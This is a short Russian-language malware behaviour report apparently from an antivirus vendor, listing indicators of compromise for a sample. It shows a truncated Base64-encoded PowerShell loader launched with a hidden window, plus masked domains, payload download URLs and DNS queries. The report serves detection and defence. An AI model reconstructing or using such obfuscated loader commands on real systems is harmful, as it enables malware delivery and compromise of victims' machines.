Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABIAGkAagBxAGYAZAB4AD0AKAAnAFEAcQAnACsAKAAnAGMAdAAyACcAKwAnAGwAJwApACsAJwB6ACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAGUAUgBwAHIAbwBGAGkAbA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1440
- %TEMP%\819301.cvr
- 'ca####studios.com':80
- 'on###six.com':80
- 'pe####tdomain.com':443
- 'pk#.goog':80
- 'li###arma.com':80
- 'li###arma.com':443
- 'da###yse.net':80
- http://ca####studios.com/bots/7/
- http://on###six.com/test/u/
- http://pk#.goog/gsr1/gsr1.crt
- http://li###arma.com/wp-content/hpu/
- http://da###yse.net/cgi-bin/8/
- 'pe####tdomain.com':443
- 'li###arma.com':443
- DNS ASK vu###itue.com
- DNS ASK ca####studios.com
- DNS ASK af######ndustries-sa.com
- DNS ASK br#########et-001-site1.ctempurl.com
- DNS ASK on###six.com
- DNS ASK pe####tdomain.com
- DNS ASK pk#.goog
- DNS ASK li###arma.com
- DNS ASK da###yse.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABIAGkAagBxAGYAZAB4AD0AKAAnAFEAcQAnACsAKAAnAGMAdAAyACcAKwAnAGwAJwApACsAJwB6ACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAGUAUgBwAHIAbwBGAGkAbA... (со скрытым окном)